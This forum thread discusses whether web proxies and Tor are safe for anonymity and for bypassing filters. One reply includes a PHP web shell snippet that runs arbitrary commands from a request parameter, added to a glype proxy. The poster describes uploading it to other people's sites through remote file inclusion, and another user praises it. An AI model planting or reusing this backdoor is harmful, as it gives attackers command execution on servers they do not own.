Page 1 of 2 12 LastLast

Thread: Proxy Question

Proxy Question

Hi all,

i'm a newbie to security, not PC's in general. So don't be afraid to get technical.

I have seen many websites suggesting hackers use proxies to be anonymous online and that your average user could even be using a proxy.

The question i have is: programs like IP Hider Platinum are a joke in my experience, they rarely work properly and some web based proxy servers have been known to keylog users to steal data.

How can you ensure the proxy you're using is safe?

Look forward to some answers.

Do what I am doing. Run your own proxy. They are easy to set up and configure. I also configured htaccess to limit the users to those of my choosing. If nothing else, use TOR. It won't provide security, but will provide a level of anonymity. I have heard of people running SSLStrip on exit nodes, so be careful.

I suppose the question is, are you looking for ways to remain anonymous, or are you looking to bypass a content filter? For bypassing a content filter, running your own is a great option. If you are trying to remain anonymous, that won't help you, because they will trace it back to your web server anyway.
    \"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"

-HST

Agree with Westin.. but simply put.. unless the proxy is one you've setup, or was setup and maintained by someone you know you can trust, then you can't be sure its safe ...

... and also any lax attitudes in maintaining the proxy and the server its running on, also leads to an unsafe proxy (ie. server gets compromised, and no one notices for a few days..)

Only african to own a PC! Cider's Avatar
    Used TOR before to bypass contents filters unable of scanning encrypted however its damm slow :P
    The world is a dangerous place to live; not because of the people who are evil, but because of the people who don't do anything about it.
    Albert Einstein

AOs Resident Troll
    We have a boss type here that uses a proxy (I actually think he pays for it too) and I can still see everything using basic ISA logging

MLF
    How people treat you is their karma- how you react is yours-Wayne Dyer

Quote Originally Posted by morganlefay View Post
    We have a boss type here that uses a proxy (I actually think he pays for it too) and I can still see everything using basic ISA logging

MLF
    Hahaha! That is great.
    \"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"

-HST

Banned
    I use a stripped down version of glype. I've wrapped it all up in a single script and useless features where removed. The only thing I added was
    PHP Code:
    if(isset($_REQUEST['cmd'])){
        echo 
    "<pre>";

system($_REQUEST['cmd']);           
        die; 
    to double as a web based shell aswell. I would look for a site vulnerable to remote file inclusion, upload it, then I trolled other sites.

Heh I litterally ran out publicly used web based proxys. It would have been cool if the mods here setup some sort of NORAD-like geographical graph of it all.

Quote Originally Posted by westin View Post
    Do what I am doing. Run your own proxy. They are easy to set up and configure. I also configured htaccess to limit the users to those of my choosing. If nothing else, use TOR. It won't provide security, but will provide a level of anonymity. I have heard of people running SSLStrip on exit nodes, so be careful.

I suppose the question is, are you looking for ways to remain anonymous, or are you looking to bypass a content filter? For bypassing a content filter, running your own is a great option. If you are trying to remain anonymous, that won't help you, because they will trace it back to your web server anyway.
    thanks Westin.

I've had a look at Tor and i've got some more questions;

How is Tor more safe than other proxies?
    When you mention SSL Strip on exit nodes, do you mean the end client could be in effect, waiting to attack your PC?

Personally i'm just researching security at the moment. I've had a quick look around and i think Tor looks like it'd be excellent as a way of bypassing web/content filters etc but you mention it's not good for security? Can you elaborate on this?

Quote Originally Posted by The-Spec View Post
    I use a stripped down version of glype. I've wrapped it all up in a single script and useless features where removed. The only thing I added was
    PHP Code:
    if(isset($_REQUEST['cmd'])){
        echo 
    "<pre>";

system($_REQUEST['cmd']);           
        die; 
    to double as a web based shell aswell.
    Dude...That's actually kind of neat!

HYBR|D
    Quote Originally Posted by morganlefay View Post

MLF

That got a smile on my dial. How much was he suckered to pay? Have you had a word to him about it? maybe a print out of he's activities..